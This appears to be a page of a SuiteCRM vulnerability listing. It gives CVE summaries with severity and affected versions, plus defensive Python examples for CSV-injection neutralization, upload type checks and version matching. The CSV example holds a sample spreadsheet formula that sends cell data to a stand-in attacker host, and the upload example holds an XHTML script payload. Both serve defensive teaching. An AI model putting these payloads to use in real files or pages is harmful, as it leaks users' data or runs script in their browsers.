Salesagility Suitecrm vulnerabilities
105 known vulnerabilities affecting salesagility/suitecrm.
Total CVEs: 105
CISA KEV: 0
Public exploits: 5
Exploited in wild: 1
Severity breakdown: CRITICAL 21, HIGH 43, MEDIUM 40, LOW 1
Vulnerabilities
Page 4 of 6
CVE-2020-8804 | P3 | MEDIUM | CVSS 6.5 | CWE-89 | ≤ 7.11.10 | 2020-02-13
SuiteCRM through 7.11.10 allows SQL Injection via the SOAP API, the EmailUIAjax interface, or the MailMerge module.
nvd
CVE-2024-36417 | P3 | CRITICAL | CVSS 9.0 | CWE-79 | fixed in 7.14.4; ≥ 8.0.0, < 8.6.1; +1 more | 2024-06-10
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, an unverified IFrame can be added to some inputs, which could allow for a cross-site scripting attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2024-36416 | P3 | HIGH | CVSS 7.5 | CWE-779 | fixed in 7.14.4; ≥ 8.0.0, < 8.6.1; +1 more | 2024-06-10
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2021-25961 | P3 | HIGH | CVSS 8.0 | CWE-640 | ≥ 7.1.7, < 7.10.32; ≥ 7.11.0, < 7.11.21; +2 more | 2021-09-29
In the SuiteCRM application, v7.1.7 through v7.10.31 and v7.11-beta through v7.11.20 fail to properly invalidate password reset links that are associated with a deleted user id, which makes account takeover possible for any newly created user with the same user id.
nvd
CVE-2020-8787 | P3 | HIGH | CVSS 7.5 | CWE-20 | ≥ 7.10.0, < 7.10.23; ≥ 7.11.0, < 7.11.11 | 2020-03-16
SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid Bean ID to be submitted.
nvd
CVE-2022-0754 | P3 | MEDIUM | CVSS 6.5 | CWE-89 | fixed in 7.12.5 | 2022-03-07
SQL Injection in GitHub repository salesagility/suitecrm prior to 7.12.5.
nvd
CVE-2024-36407 | P3 | MEDIUM | CVSS 6.5 | CWE-640 | fixed in 7.14.4; ≥ 8.0.0, < 8.6.1; +1 more | 2024-06-10
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions prior to 7.14.4 and 8.6.1, a user's password can be reset by an unauthenticated attacker. The attacker does not get access to the new password, but this can be annoying for the user. This attack is also dependent on some password reset functionalities
nvd
CVE-2024-49773 | P3 | MEDIUM | CVSS 6.5 | CWE-89 | fixed in 7.14.6; ≥ 8.0.0, < 8.7.1; +1 more | 2024-11-05
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Poor input validation in export allows an authenticated user to perform a SQL injection attack. User-controlled input is used to build the SQL query. The `current_post` parameter in the `export` entry point can be abused to perform blind SQL injection via generateSearc
nvd
CVE-2024-36414 | P3 | MEDIUM | CVSS 6.5 | CWE-918 | fixed in 7.14.4; ≥ 8.0.0, < 8.6.1; +1 more | 2024-06-10
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in the connectors file verification allows for a server-side request forgery attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2023-3627 | P3 | HIGH | CVSS 8.8 | CWE-352 | fixed in 8.3.1 | 2023-07-11
Cross-Site Request Forgery (CSRF) in GitHub repository salesagility/suitecrm-core prior to 8.3.1.
nvd
CVE-2020-15301 | P3 | HIGH | CVSS 7.8 | CWE-1236 | ≤ 7.11.13; ≥ v7.10.29, < v7.10*; +1 more | 2020-11-18
SuiteCRM through 7.11.13 allows CSV Injection via registration fields in the Accounts, Contacts, Opportunities, and Leads modules. These fields are mishandled during a Download Import File Template operation.
nvd
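CSV injection of the kind CVE-2020-15301 describes works because a spreadsheet opening the exported file evaluates any cell that begins with a formula character. The following is an added example, not SuiteCRM's own export code: a neutralizer that prefixes such cells so they are displayed as text, wired into a CSV writer that quotes every field. The record layout and the sample Lead with a formula payload are constructed for the demonstration.

```python
import csv
import io

# Leading characters a spreadsheet treats as the start of a formula or a
# field-separator trick (OWASP CSV Injection guidance). Tab and carriage
# return are listed because some applications strip leading whitespace
# before evaluating the cell.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return text a spreadsheet will display literally rather than evaluate.

    A leading single quote marks the cell as text in Excel and LibreOffice.
    Quoting of separators and embedded double quotes is left to the CSV
    writer, which is configured to quote every field.
    """
    if value is None:
        return ""
    text = str(value)
    if text.startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_rows(headers, rows):
    """Serialize records to CSV text with every data cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(headers)
    for row in rows:
        writer.writerow([neutralize_cell(v) for v in row])
    return buf.getvalue()


# Constructed sample records: the second is a Lead whose first_name was
# submitted through a public registration form and carries a formula.
SAMPLE_HEADERS = ["first_name", "last_name", "phone"]
SAMPLE_ROWS = [
    ["Alice", "Example", "+1 555 0100"],
    ['=HYPERLINK("http://attacker.example/?"&A1,"click")', "Lead", "-555"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_HEADERS, SAMPLE_ROWS))
```

The trade-off is visible in the first sample row: a legitimate phone number starting with "+" also gets the quote and becomes text in the spreadsheet. Plain CSV has no typed cells, so the alternatives are to neutralize only free-text fields, or to export to a format that carries cell types.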
CVE-2022-0756 | P3 | MEDIUM | CVSS 6.5 | CWE-862 | fixed in 7.12.5 | 2022-03-07
Missing Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.
nvd
CVE-2023-5353 | P3 | MEDIUM | CVSS 6.5 | CWE-284 | fixed in 7.14.1 | 2023-10-03
Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.14.1.
nvd
CVE-2025-54786 | P4 | MEDIUM | CVSS 5.3 | CWE-200 | v7.14.6; v8.8.0 | 2025-08-07
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 7.14.6 and 8.8.0, the broken authentication in the legacy iCal service allows unauthenticated access to meeting data. An unauthenticated actor can view any user's meeting (calendar event) data given their username, related functional
nvd
CVE-2022-50590 | P4 | MEDIUM | CVSS 5.3 | CWE-843 | fixed in 7.12.6 | 2025-11-06
SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects, including changing the email address of the administrator.
nvd
CVE-2021-41596 | P4 | MEDIUM | CVSS 5.3 | CWE-22 | fixed in 7.10.33; ≥ 7.11.0, < 7.11.22 | 2021-10-04
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the importFile parameter of the RefreshMapping import functionality.
nvd
CVE-2021-41595 | P4 | MEDIUM | CVSS 5.3 | CWE-22 | fixed in 7.10.33; ≥ 7.11.0, < 7.11.22 | 2021-10-04
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the file_name parameter of the Step3 import functionality.
nvd
CVE-2021-39267 | P4 | MEDIUM | CVSS 6.1 | CWE-79 | fixed in 7.11.19 | 2021-08-18
Persistent cross-site scripting (XSS) in the web interface of SuiteCRM before 7.11.19 allows a remote attacker to introduce arbitrary JavaScript via a Content-Type Filter bypass to upload malicious files. This occurs because text/html is blocked, but other types that allow JavaScript execution (such as text/xml) are not blocked.
nvd
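The CVE-2021-39267 entry is the classic blocklist failure: refusing text/html says nothing about text/xml, XHTML or SVG, all of which a browser will render and script. As an added example (not SuiteCRM code, and not a description of its actual fix), the block below puts the vulnerable blocklist check next to a hardened version that allowlists media types, sniffs the payload for markup, and sets the response headers that prevent a stored attachment from rendering inline even if a check is bypassed later. The allowed types, header names and the XHTML sample payload are constructed for the example.

```python
# Blocklist of the kind the advisory describes: only text/html is refused.
BLOCKED_TYPES = {"text/html"}

# Allowlist for an attachment upload: only the media types the feature needs
# (assumed set for this example).
ALLOWED_TYPES = {"application/pdf", "image/png", "image/jpeg", "text/plain", "text/csv"}

# Media types a browser renders as a document that can run script. Kept as a
# second guard so a later edit to ALLOWED_TYPES cannot re-introduce them.
SCRIPT_CAPABLE_TYPES = {
    "text/html", "application/xhtml+xml", "text/xml", "application/xml", "image/svg+xml",
}


def normalize_content_type(header):
    """'Text/XML; charset=utf-8' -> 'text/xml': drop parameters, fold case."""
    return header.split(";", 1)[0].strip().lower()


def blocklist_allows(content_type):
    """Vulnerable check: refuses text/html and nothing else, so text/xml passes."""
    return normalize_content_type(content_type) not in BLOCKED_TYPES


def looks_like_markup(data):
    """Cheap content sniff: the payload starts like XML/HTML/SVG or embeds a script tag."""
    head = data[:1024].lstrip().lower()
    return head.startswith((b"<?xml", b"<!doctype", b"<html", b"<svg")) or b"<script" in head


def allowlist_allows(content_type, data):
    """Hardened check: allowlisted type, never a script-capable type, and the
    bytes must not contradict the declared type by looking like markup."""
    ct = normalize_content_type(content_type)
    if ct not in ALLOWED_TYPES or ct in SCRIPT_CAPABLE_TYPES:
        return False
    return not looks_like_markup(data)


def download_headers(filename):
    """Response headers that keep a stored attachment from executing even if the
    upload check is ever bypassed: force download, forbid sniffing, sandbox."""
    safe_name = filename.replace('"', "").replace("\r", "").replace("\n", "")
    return {
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Constructed sample: an XHTML document labelled text/xml, the bypass shape
# the advisory describes.
XML_SCRIPT_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<html xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></html>'
)

if __name__ == "__main__":
    print("blocklist lets text/xml through:", blocklist_allows("text/xml"))
    print("allowlist rejects it:", not allowlist_allows("text/xml", XML_SCRIPT_PAYLOAD))
```

The sniffing step is deliberately coarse; its job is to catch a declared type that contradicts the bytes, not to classify files. The download headers are the control that matters most for stored XSS through uploads, because they remove the browser's reason to execute anything regardless of what the upload filter let in.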
CVE-2025-54784 | P4 | MEDIUM | CVSS 6.1 | CWE-79 | ≥ 7.14.0, < 7.14.7; ≥ 8.6.0, < 8.8.1 | 2025-08-07
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. There is a Cross Site Scripting (XSS) vulnerability in the email viewer in versions 7.14.0 through 7.14.6. An external attacker could send a prepared message to the inbox of the SuiteCRM instance. By simply viewing emails as the logged-in user, t
nvd
CVE-2023-6388 | P4 | MEDIUM | CVSS 5.0 | CWE-918 | v7.14.2 | 2024-02-07
Suite CRM version 7.14.2 allows making arbitrary HTTP requests through the vulnerable server. This is possible because the application is vulnerable to SSRF.
nvd
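The affected-version column above mixes several notations ("≤ 7.11.10", "fixed in 7.14.4", "≥ 8.0.0, < 8.6.1", a bare "v7.14.2"), and a practitioner's first question is which of these CVEs apply to the build actually deployed. The block below is an added example, not part of this listing or of SuiteCRM: a small version parser and range matcher with the ranges on this page transcribed as data. Two readings are assumptions, since the page does not define them: "fixed in X" is taken to mean every release on X's major line below X, and a bare version means exactly that release. Rows the page marks "+1 more" or "+2 more" have ranges that are not visible here, and the garbled "< v7.10*" range of CVE-2020-15301 is omitted (its "≤ 7.11.13" range already covers it).

```python
import re

# Version strings as they appear in this listing: "7.11.10", "v7.10.29", "7.11-beta".
_VERSION_RE = re.compile(r"^v?(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:-([0-9A-Za-z.]+))?$")


def parse_version(text):
    """Return a comparable tuple (major, minor, patch, release_flag, prerelease).

    release_flag is 1 for a final release and 0 for a pre-release, so that
    7.11-beta sorts before 7.11.0, as SemVer precedence requires.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised version: %r" % text)
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor or 0), int(patch or 0), 0 if pre else 1, pre or "")


def parse_range(spec):
    """Turn one affected-version string from the listing into a predicate.

    Assumed reading (the page does not define it): "fixed in X" covers every
    release on X's major line below X; a bare "vX" means exactly that release;
    "≥ A, < B" is the half-open interval [A, B).
    """
    spec = spec.strip()
    if spec.startswith("fixed in "):
        fixed = parse_version(spec[len("fixed in "):])
        return lambda v: v[0] == fixed[0] and v < fixed

    bounds = []
    for part in spec.split(","):
        m = re.match(r"^(≤|<=|≥|>=|<|>)\s*(\S+)$", part.strip())
        if m:
            bounds.append((m.group(1), parse_version(m.group(2))))
        else:
            bounds.append(("==", parse_version(part)))

    def predicate(v):
        for op, ver in bounds:
            ok = {
                "≤": v <= ver, "<=": v <= ver, "<": v < ver,
                "≥": v >= ver, ">=": v >= ver, ">": v > ver,
                "==": v == ver,
            }[op]
            if not ok:
                return False
        return True

    return predicate


# The affected-version column of this page, transcribed as shown. Rows the page
# marks "+1 more"/"+2 more" have further ranges not visible here, so a
# "not affected" verdict for those CVEs is not conclusive.
ADVISORIES = {
    "CVE-2020-8804": ["≤ 7.11.10"],
    "CVE-2024-36417": ["fixed in 7.14.4", "≥ 8.0.0, < 8.6.1"],
    "CVE-2024-36416": ["fixed in 7.14.4", "≥ 8.0.0, < 8.6.1"],
    "CVE-2021-25961": ["≥ 7.1.7, < 7.10.32", "≥ 7.11.0, < 7.11.21"],
    "CVE-2020-8787": ["≥ 7.10.0, < 7.10.23", "≥ 7.11.0, < 7.11.11"],
    "CVE-2022-0754": ["fixed in 7.12.5"],
    "CVE-2024-36407": ["fixed in 7.14.4", "≥ 8.0.0, < 8.6.1"],
    "CVE-2024-49773": ["fixed in 7.14.6", "≥ 8.0.0, < 8.7.1"],
    "CVE-2024-36414": ["fixed in 7.14.4", "≥ 8.0.0, < 8.6.1"],
    "CVE-2023-3627": ["fixed in 8.3.1"],
    "CVE-2020-15301": ["≤ 7.11.13"],  # second range on the page is garbled; omitted
    "CVE-2022-0756": ["fixed in 7.12.5"],
    "CVE-2023-5353": ["fixed in 7.14.1"],
    "CVE-2025-54786": ["v7.14.6", "v8.8.0"],
    "CVE-2022-50590": ["fixed in 7.12.6"],
    "CVE-2021-41596": ["fixed in 7.10.33", "≥ 7.11.0, < 7.11.22"],
    "CVE-2021-41595": ["fixed in 7.10.33", "≥ 7.11.0, < 7.11.22"],
    "CVE-2021-39267": ["fixed in 7.11.19"],
    "CVE-2025-54784": ["≥ 7.14.0, < 7.14.7", "≥ 8.6.0, < 8.8.1"],
    "CVE-2023-6388": ["v7.14.2"],
}


def affected_cves(installed, advisories=ADVISORIES):
    """Sorted CVE IDs whose listed ranges include the installed version."""
    v = parse_version(installed)
    return sorted(cve for cve, specs in advisories.items()
                  if any(parse_range(s)(v) for s in specs))


if __name__ == "__main__":
    for ver in ("7.11.10", "7.14.6", "8.6.0"):
        print(ver, "->", ", ".join(affected_cves(ver)) or "none of the listed CVEs")
```

One discrepancy the matcher makes visible: the CVE-2021-25961 description says v7.11-beta is affected, but the page's range notation starts at "≥ 7.11.0", which excludes a pre-release under SemVer ordering. Treat the prose of an advisory as authoritative over a summarised range when they disagree.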